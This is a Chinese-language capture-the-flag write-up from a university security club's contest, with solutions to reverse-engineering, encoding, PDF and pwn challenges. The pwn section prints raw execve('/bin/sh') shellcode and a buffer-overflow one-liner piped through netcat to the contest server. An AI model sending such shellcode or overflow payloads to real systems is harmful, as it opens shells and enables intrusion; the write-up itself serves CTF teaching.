西理工网安小组第二次校赛题解
马上就要2022年了,人却被困在学校回不去。
但这并不影响我写个WriteUp,是时候该整理一下今年见到的东西了。
12-23 5点钟加了个Pwn的题解
Reverse
逆向的题都是从不同地方抄来的(属实太菜,想不出人家的脑洞)
但都是比赛真题,不知道能否给大家带来些启发
easy_py
介绍语:一道简单的Python逆向
分数:100
源码可以通过
或uncompyle6反编译
uncompyle6 ‐o 1.py ./easy_py.pyc
题解:
该题是创建了个全局变量,通过两个线程将其进行递减,并进行相关算法:将输入的数据从后往前(37~0),按照列表顺序,当顺序号为:
奇数执行 t1 线程算法:将该数据与顺序进行异或
偶数执行 t2 线程算法:将该数据与后一个数据进行异或
flag=[ 23, 72, 77, 125, 115, 74, 27, 98, 23, 87, 0, 95]j=0for i in flag: if j%2==0: flag[j]=flag[j]^flag[j+1] j+=1 else: flag[j]=flag[j]^j j+=1
for i in range(len(flag)): flag[i]=chr(flag[i])flagstr=''flagstr=''.join(flag)
print(flagstr)
flag{_I0~9Oye@^_T}
easy_crack
介绍语:无
分数:200
Vivo千镜杯的题目,这是第一次做到这么简单的移动逆向,打开GDA基本就能得出结果
flag{vivoNeedYou}
Good_old_day
介绍语:正统C++逆向,第一次校赛的题目,分析算法写出注册机,用户名为CTFHUB,flag{Serial Number},使用x64dbg等工具有助于理解
分数:200
如果没人做出来给的Hint:看雪CTF——国色天香
题解:
https://blog.csdn.net/henuyl/article/details/107046902
//// Created by Administrator on 2021/10/22.//#include <iostream>#include <cstdio>#include <cstring>
using namespace std;char uName[25] = {0};char uNameKey[25] = {0};char uKey[25] = {0};
int main(int argc){ cout << "please press your username..." << endl; int ebx = 0; int ecx = 0; int edx = 0; while(~scanf("%s", uName)){ int uNameLen = strlen(uName); if(uNameLen == 0){ cout << "Enter Name!" << endl; continue; }else if(uNameLen > 0x20){ cout << "Name can be max 32 Chars long!" << endl; continue; }else if(uNameLen < 5){ cout << "Name must be min 5 Chars long!" << endl; continue; } break; }
ecx = 0; int al = 0x5; edx = 0; while(true){ int cl = uName[edx]; cl = cl ^ 0x29; cl = cl + al; if(cl < 0x41 || cl > 0x5A){ cl = 0x52; cl = cl + al; } uNameKey[edx] = cl; uNameKey[edx + 1] = 0x0; edx ++; al --; if(al == 0) break; } edx = 0; al = 5; while(true){ int cl = uName[edx]; cl = cl ^ 0x27; cl = cl + al; if(cl < 0x41 || cl > 0x5A){ cl = 0x4D; cl = cl + al; } uNameKey[edx + 5] = cl; uNameKey[edx + 5 + 1] = 0x0; edx ++; al --; if(al == 0) break; } uNameKey[10] = '\0'; printf("uNameKey = %s\n", uNameKey); ebx = 0; ecx = 0; edx = 0;
while(true){
int dl = uNameKey[ecx]; if(dl == 0x0){ break; } dl += 0x5; if(dl > 0x5a){ dl -= 0xd; } dl = dl ^ 0xc; if(dl < 0x41){ dl = 0x4b; dl += ecx; } if(dl > 0x5A){ dl = 0x4b; dl -= ecx; } uKey[ecx] = dl; ecx ++; } uKey[ecx] = '\0';
printf("uKey = %s\n", uKey); getchar(); getchar(); return 0;}
补充一下,配合IDA的话效率会高些(会发现与题解的相似之处)
flag{CBVUTFZYXB}
Misc
奇奇怪怪的编码
介绍语:在CTF的Misc中,总能遇到些奇奇怪怪的编码,使用 CTF在线工具 则可以事半功倍
分数:100
文件:testflag.pdf
思路来源:2021极客谷杯
编码1:泡泡牙牙学语xinik-samak-luvah-bosik-cysel-funox
编码2: JJ$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"_"+$.___+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.__$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$_$_+"\\"+$.__$+$.$_$+$.___+"}"+"\"")())();
编码1:气泡加密-bubble
http://www.hiencode.com/bubble.html
编码2:JJ编码
http://www.hiencode.com/jjencode.html
flag{Pra1se_0mn1ssiah}
介绍语:一个很普通的PDF文件
分数:200
文件:testflag.pdf
思路来源:攻防世界-PDF
百度一堆答案,我自己做的时候格式工厂PDF转word,马上就出来了
flag{Warhamm3r_4k_is_ok}
Pwn
受Pwn出题人委托,挂上PWN的题解
居然没人做Pwn,可惜了
shellcode
(echo -en "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05";cat)|nc xaut.team 4002
Overflow
(python -c "print('a'*0x801)";cat)|nc xaut.team 4001